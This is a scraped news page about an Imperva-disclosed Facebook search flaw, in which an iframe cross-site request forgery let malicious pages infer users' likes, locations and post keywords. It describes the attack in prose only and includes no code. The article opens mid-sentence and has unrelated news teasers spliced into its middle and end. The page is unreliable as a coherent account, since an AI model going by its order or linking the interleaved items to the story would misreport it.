Vulnerability in Facebook could have exposed personal user data

15 November, 2018, 21:01 | Author: Sammy Rose
  • Another Facebook vulnerability risked personal user information

Instead, Imperva security researcher Masas says in the announcement, "Having reported the vulnerability to Facebook under their responsible disclosure program in May 2018, we worked with the Facebook Security Team to mitigate regressions and ensure that the issue was thoroughly resolved".

"A unique feature of the uncovered bug is the exploitation of the Iframe element within Facebook's search feature", Masas told SiliconANGLE Tuesday. Masas found that Facebook search results were not sufficiently protected from cross-site request forgery attacks, meaning bad actors could have used an iFrame to extract data from a logged-in Facebook profile in another tab.

Ankush Johar, Director at Infosec Ventures explained, "Although CSRF flaws have a big prerequisite to work that the user must be logged in to the website while he/she visits the infected page, what makes the Facebook vulnerability risky is, unlike other websites, most of the users are always logged into Facebook in their browsers thus putting everyone at massive risks". For example, the exploit could see if a user liked a certain page.

Attackers could have run queries with certain graph searches, such as to find out whether you liked a page, if you took photos at a certain location or if you or your friends used specific keywords in your posts.

Masas warned that though a CSRF attack is not a common technique, it could rise in popularity next year.

Couple, homeless man charged with faking story that earned $400K in donations
The Burlington County Prosecutor's office is expected to make an announcement in the case Thursday, according to multiple reports. The couple turned themselves in to authorities on Wednesday, but Bobbitt was still at large, the news station said.


Google Internet Traffic Routed Through China, Russia, Nigeria During Brief Outage 11/14/2018
Main One peers with Google, in that they agree to exchange traffic with each other through a peering point. The disruption in Google services was limited to almost an hour.


Giants beat 49ers 27-23
The pass completed a nine-play, 75-yard drive, after Manning took over on his own 25-yard line with 2:46 to play, trailing 23-20. Those sacks have amounted to 231 lost yards, nearly half as many as running back Saquon Barkley's total rushing yards (519).


While testing out the attack, Masas was able to determine specific data on users and their friends regardless of one's privacy settings. If the user interacts with this page in any possible manner such as scrolling or clicking, the page will automatically execute malicious JavaScript code that will automate the search queries in a new tab.

Masas added that the vulnerability was especially unsafe for mobile phone users, who may not even notice a new browser tab opening when the attack takes place.

These search queries, even if they didn't expose fine-grained details, they did expose second-hand information that could reveal, when pieced together, the identity of a user and his friends circle.

Imperva, a cybersecurity company, discovered the flaw and disclosed it to Facebook in May. "As the underlying behavior is not specific to Facebook, we've made recommendations to browser makers and relevant web standards groups to encourage them to take steps to prevent this type of issue from occurring in other web applications".

News of the bug comes amid increased scrutiny for Facebook following a string of data privacy scandals.

Recommended:



Popular

Opinions & Transfer NewsManchester United made favourites to land Marko Arnautovic
As the Express report , Maurizio Sarri's side are the second favourites to sign Arnautovic, narrowly behind Manchester United . West Ham fans will dread to think where they would be without Arnautovic's influence.

Study finds decreased social media use improves mood and wellbeing
But the restrictions had no impact on feelings of social support, self-esteem or one's overall sense of well-being. Seventy-eight percent of them use Snapchat, 71 percent use Instagram and 45 percent use Twitter, Pew says.

John Lewis Christmas advert stars Broadstairs boy Hudson Trindall as Elton John
A spokesperson from John Lewis told Express.co.uk: "So this Christmas, we will be selling pianos, so you can buy the gift". John Lewis is understood to usually spend around £7m on its Christmas campaign , including creative and media.

Rooney to wear 10 shirt, captain's armband in England farewell
While Thursday's match will bring the curtain down on Rooney's England career, Southgate will hand out a "few debuts" to others. Rooney made a romantic return to boyhood club Everton last season, scoring 10 league goals.

Mithali stars in facile win over Pakistan
By the time Raj was dismissed India was already well on their way to victory with only eight runs needed from 14 balls. BOWLING: A Reddy 4-1-24-1, RP Yadav 4-0-26-0, DB Sharma 4-0-26-0, D Hemalatha 4-0-34-2, Poonam Yadav 4-0-22-2.

Pakistan confirms it discussed Asia Bibi's case with Canada
A survey in 2013 that more than 10 million Pakistanis had said they would be willing to personally killed Ms Bibi . The police intervened to save Asia from a mob, then began their investigation into her alleged blasphemy.

Netherlands Cuts Pakistan Visa Services amid Islamist Threats over Asia Bibi
The charge also carries the death penalty and critics say the controversial blasphemy law is abused to settle religious scores. Bibi's ordeal dates back to 2009 when she went to fetch water for herself and fellow farmworkers.

English FA to cut foreign players in Premier League
Premier League clubs are expected to vote against proposals to limit the number of foreigners in their squads ahead of Brexit . Only seven clubs in England's top flight would meet those requirements if they were in place this season.

Leaked pictures from Deepika, Ranveers wedding
Moreover, according to reports in the Indian media, the couple will release the pictures at 6pm today. Ranveer Singh and Deepika Padukone's nuptials are being attended by close friends and family.

Irish outcry over teenager's underwear used in rape trial
According to Ms Coppinger, this is not the first time underwear has been used as evidence within a rape trial in Ireland. A barrister in the Cork trial told the jury to look at the way the complainant was dressed.